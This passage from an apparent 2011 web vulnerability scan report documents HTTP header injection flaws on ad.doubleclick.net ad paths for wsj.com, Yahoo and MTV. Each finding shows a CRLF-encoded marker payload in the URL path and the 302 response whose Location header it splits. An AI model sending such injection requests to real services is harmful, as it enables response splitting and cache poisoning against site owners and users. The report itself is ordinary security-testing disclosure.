The value of REST URL parameter 1 is copied into the Location response header. The payload f1e1b%0d%0a757e311c10f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /f1e1b%0d%0a757e311c10f;src=490793;type=healt926;cat=snipp989;ord=7420981572940.945? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/f1e1b
757e311c10f
;src=490793;type=healt926;cat=snipp989;ord=7420981572940.945:
Date: Tue, 14 Jun 2011 00:15:56 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/ad/N3282.wsj.com/B3951656 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3282.wsj.com/B3951656

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 20668%0d%0ab389d2ddde4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /20668%0d%0ab389d2ddde4/N3282.wsj.com/B3951656;sz=1x1;p=%9BKHUWN%A2;ord=3132099? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber;;s=8_10001;mc=b2pfreezone;pos=2;tile=4;sz=170x67;ord=4904490449044904;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/20668
b389d2ddde4
/N3282.wsj.com/B3951656;sz=1x1;p=.KHUWN.;ord=3132099:
Date: Tue, 14 Jun 2011 00:15:46 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.3. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N447.153730.YAHOO.COM/B5548365.27

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 903fb%0d%0a38f723404aa was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /903fb%0d%0a38f723404aa/N447.153730.YAHOO.COM/B5548365.27;sz=200x33;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15mb2d4v4/M=801902.14713345.14495286.13349988/D=my/S=150001785:RQ1/Y=YAHOO/EXP=1307981481/L=pCn7imKL8NLm3NorTdAdCwBurcHW8032GokAA_Py/B=FDJADWKL5Us-/J=1307974281291848/K=gRvxSKzfqEbroTIaTR.s5w/A=6407512/R=0/*;ord=0.04136643558740616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/903fb
38f723404aa
/N447.153730.YAHOO.COM/B5548365.27;sz=200x33;dcopt=rcl;mtfIFPath=nofile;click=http: //global.ard.yahoo.com/SIG=15mb2d4v4/M=801902.14713345.14495286.13349988/D=my/S=150001785:RQ1/Y=YAHOO/EXP=1307981481/L=pCn7imKL8NLm3NorTdAdCwBurcHW8032GokAA_Py/B=FDJADWKL5Us-/J=1307974281291848/K=gR
Date: Mon, 13 Jun 2011 14:13:09 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.4. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/brokerbuttons.wsj.com/us_subscriber

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 778c8%0d%0a56e4198e1a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /778c8%0d%0a56e4198e1a/brokerbuttons.wsj.com/us_subscriber;;s=8_10001;mc=b2pfreezone;pos=1;tile=3;sz=170x67;ord=4904490449044904; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/778c8
56e4198e1a
/brokerbuttons.wsj.com/us_subscriber;;s=8_10001;mc=b2pfreezone;pos=1;tile=3;sz=170x67;ord=4904490449044904;:
Date: Tue, 14 Jun 2011 00:15:58 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.5. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/tech_front

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 29a4b%0d%0aece2e9b9626 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /29a4b%0d%0aece2e9b9626/interactive.wsj.com/tech_front;u=%5E%5ElA;;s=8_10001;mc=b2pfreezone;tile=1;sz=377x50;ord=4904490449044904; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/29a4b
ece2e9b9626
/interactive.wsj.com/tech_front;u=^^lA;;s=8_10001;mc=b2pfreezone;tile=1;sz=377x50;ord=4904490449044904;:
Date: Tue, 14 Jun 2011 00:15:55 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.6. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/tech_main_story

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2fbd2%0d%0a7f64288fd33 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2fbd2%0d%0a7f64288fd33/interactive.wsj.com/tech_main_story;u=%5E%5ElDlIlPlQlA;;msrc=WSJ_Tech_LEADTop;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=1;sz=377x50;ord=8210821082108210; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2fbd2
7f64288fd33
/interactive.wsj.com/tech_main_story;u=^^lDlIlPlQlA;;msrc=WSJ_Tech_LEADTop;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=1;sz=377x50;ord=8210821082108210;:
Date: Tue, 14 Jun 2011 00:16:02 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.7. http://ad.doubleclick.net/adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 16d55%0d%0a0e95c6c688f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /16d55%0d%0a0e95c6c688f/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect;sec0=videos;sec1=mike-taylor;sec2=_659420;sec3=perfect;franchise=MTVMusicVideoPicksonOverdrive;franchise=MTVMusicVideoPicksonOverdrive;artist=Mike_Taylor;artist=Mike_Taylor;!category=expand;!category=float;!category=pop;!category=video;video_id=659420;partner=mv;content_id=1518072;pos=atf;tag=adi;mtype=standard;sz=728x90;tile=2;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;!category=mv;!category=partner;u=franchise-MTVMusicVideoPicksonOverdrive%7Cfranchise-MTVMusicVideoPicksonOverdrive%7Cartist-Mike_Taylor%7Cartist-Mike_Taylor%7C!category-expand%7C!category-float%7C!category-pop%7C!category-video%7Cvideo_id-659420%7Cpartner-mv%7Ccontent_id-1518072%7Cpos-atf%7Ctag-adi%7Cmtype-standard%7Csz-728x90%7Ctile-2%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774%7C!category-mv%7C!category-partner;ord=942670129658654300? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/videos/mike-taylor/659420/perfect.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/16d55
0e95c6c688f
/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect;sec0=videos;sec1=mike-taylor;sec2=_659420;sec3=perfect;franchise=MTVMusicVideoPicksonOverdrive;franchise=MTVMusicVideoPicksonOverdrive;artist=Mike_Taylor;artist=Mike_Taylor;!category=expand;!category=float;!category=pop;!cate:
Date: Tue, 14 Jun 2011 00:18:59 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.8. http://ad.doubleclick.net/adi/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 91475%0d%0ab926d5ec16 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /91475%0d%0ab926d5ec16/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect;sec0=videos;sec1=mike-taylor;sec2=_659420;sec3=perfect;franchise=MTVMusicVideoPicksonOverdrive;franchise=MTVMusicVideoPicksonOverdrive;artist=Mike_Taylor;artist=Mike_Taylor;!category=expand;!category=float;!category=pop;!category=video;video_id=659420;partner=mv;content_id=1518072;pos=btf;tag=adi;mtype=standard;sz=300x250;tile=3;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;!category=mv;!category=partner;u=franchise-MTVMusicVideoPicksonOverdrive%7Cfranchise-MTVMusicVideoPicksonOverdrive%7Cartist-Mike_Taylor%7Cartist-Mike_Taylor%7C!category-expand%7C!category-float%7C!category-pop%7C!category-video%7Cvideo_id-659420%7Cpartner-mv%7Ccontent_id-1518072%7Cpos-btf%7Ctag-adi%7Cmtype-standard%7Csz-300x250%7Ctile-3%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774%7C!category-mv%7C!category-partner;ord=942670129658654300? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/videos/mike-taylor/659420/perfect.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/91475
b926d5ec16
/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect;sec0=videos;sec1=mike-taylor;sec2=_659420;sec3=perfect;franchise=MTVMusicVideoPicksonOverdrive;franchise=MTVMusicVideoPicksonOverdrive;artist=Mike_Taylor;artist=Mike_Taylor;!category=expand;!category=float;!category=pop;!categ:
Date: Tue, 14 Jun 2011 00:18:52 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.9. http://ad.doubleclick.net/adi/mtv.mtvi/survey [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/mtv.mtvi/survey

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 22809%0d%0ab65a54cc41a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /22809%0d%0ab65a54cc41a/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/music/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/22809
b65a54cc41a
/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100:
Date: Tue, 14 Jun 2011 00:17:47 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.10. http://ad.doubleclick.net/adj/interactive.wsj.com/tech_front [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/interactive.wsj.com/tech_front

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 33fc2%0d%0a660ac79f9dc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /33fc2%0d%0a660ac79f9dc/interactive.wsj.com/tech_front;;s=8_10001;mc=b2pfreezone;tile=6;sz=336x280,300x250;ord=4904490449044904; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/tech_front;;s=8_10001;mc=b2pfreezone;tile=6;sz=336x280,300x250;ord=4904490449044904;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/33fc2
660ac79f9dc
/interactive.wsj.com/tech_front;;s=8_10001;mc=b2pfreezone;tile=6;sz=336x280,300x250;ord=4904490449044904;:
Date: Tue, 14 Jun 2011 00:15:56 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.11. http://ad.doubleclick.net/adj/interactive.wsj.com/tech_main_story [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/interactive.wsj.com/tech_main_story

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7dd09%0d%0ae73ef701a8c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7dd09%0d%0ae73ef701a8c/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;biz=1080;biz=1027;biz=1053;;p39=220;p39=239;p39=227;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=5;sz=336x280,300x250;ord=8210821082108210; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;biz=1080;biz=1027;biz=1053;;p39=220;p39=239;p39=227;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=5;sz=336x280,300x250;ord=8210821082108210;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7dd09
e73ef701a8c
/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;biz=1080;biz=1027;biz=1053;;p39=220;p39=239;p39=227;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=5;sz=336x280,300x250;ord=8210821082108210;:
Date: Tue, 14 Jun 2011 00:16:23 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.12. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/music/_mn [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mtv.mtvi/atf_j_s/music/_mn

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 469eb%0d%0ae53c58461e1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /469eb%0d%0ae53c58461e1/mtv.mtvi/atf_j_s/music/_mn;sec0=music;sec1=_mn;!category=expand;!category=float;node=survey;pos=atf;tag=adj;mtype=standard;sz=6x6;tile=1;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;dcopt=ist;u=!category-expand%7C!category-float%7Cnode-survey%7Cpos-atf%7Ctag-adj%7Cmtype-standard%7Csz-6x6%7Ctile-1%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774%7Cdcopt-ist;ord=927227632701397000? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/music/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/469eb
e53c58461e1
/mtv.mtvi/atf_j_s/music/_mn;sec0=music;sec1=_mn;!category=expand;!category=float;node=survey;pos=atf;tag=adj;mtype=standard;sz=6x6;tile=1;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=:
Date: Tue, 14 Jun 2011 00:18:03 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.13. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/mv/videos/mike-taylor/_659420/perfect [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mtv.mtvi/atf_j_s/mv/videos/mike-taylor/_659420/perfect

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 66ca2%0d%0a4341a7674c7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /66ca2%0d%0a4341a7674c7/mtv.mtvi/atf_j_s/mv/videos/mike-taylor/_659420/perfect;sec0=videos;sec1=mike-taylor;sec2=_659420;sec3=perfect;franchise=MTVMusicVideoPicksonOverdrive;franchise=MTVMusicVideoPicksonOverdrive;artist=Mike_Taylor;artist=Mike_Taylor;!category=expand;!category=float;!category=pop;!category=video;video_id=659420;partner=mv;content_id=1518072;pos=atf;tag=adj;mtype=standard;sz=6x6;tile=1;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;dcopt=ist;!category=mv;!category=partner;u=franchise-MTVMusicVideoPicksonOverdrive%7Cfranchise-MTVMusicVideoPicksonOverdrive%7Cartist-Mike_Taylor%7Cartist-Mike_Taylor%7C!category-expand%7C!category-float%7C!category-pop%7C!category-video%7Cvideo_id-659420%7Cpartner-mv%7Ccontent_id-1518072%7Cpos-atf%7Ctag-adj%7Cmtype-standard%7Csz-6x6%7Ctile-1%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774%7Cdcopt-ist%7C!category-mv%7C!category-partner;ord=942670129658654300? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/videos/mike-taylor/659420/perfect.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/66ca2
4341a7674c7
/mtv.mtvi/atf_j_s/mv/videos/mike-taylor/_659420/perfect;sec0=videos;sec1=mike-taylor;sec2=_659420;sec3=perfect;franchise=MTVMusicVideoPicksonOverdrive;franchise=MTVMusicVideoPicksonOverdrive;artist=Mike_Taylor;artist=Mike_Taylor;!category=expand;!category=float;!category=pop;!cate:
Date: Tue, 14 Jun 2011 00:18:54 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.14. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/_hp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mtv.mtvi/btf_j_s/_hp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 25871%0d%0ae35eac74214 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /25871%0d%0ae35eac74214/mtv.mtvi/btf_j_s/_hp;sec0=_hp;!category=_hp;!category=float;!category=pop;!category=video;!category=expand;!category=pointroll;pos=btf;tag=adj;mtype=standard;sz=728x90;tile=3;u=!category-_hp%7C!category-float%7C!category-pop%7C!category-video%7C!category-expand%7C!category-pointroll%7Cpos-btf%7Ctag-adj%7Cmtype-standard%7Csz-728x90%7Ctile-3;ord=892685005487874200? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/25871
e35eac74214
/mtv.mtvi/btf_j_s/_hp;sec0=_hp;!category=_hp;!category=float;!category=pop;!category=video;!category=expand;!category=pointroll;pos=btf;tag=adj;mtype=standard;sz=728x90;tile=3;u=!category-_hp|!category-float|!category-pop|!category-video|!category-expand|!category-pointroll|pos-bt:
Date: Tue, 14 Jun 2011 00:17:17 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

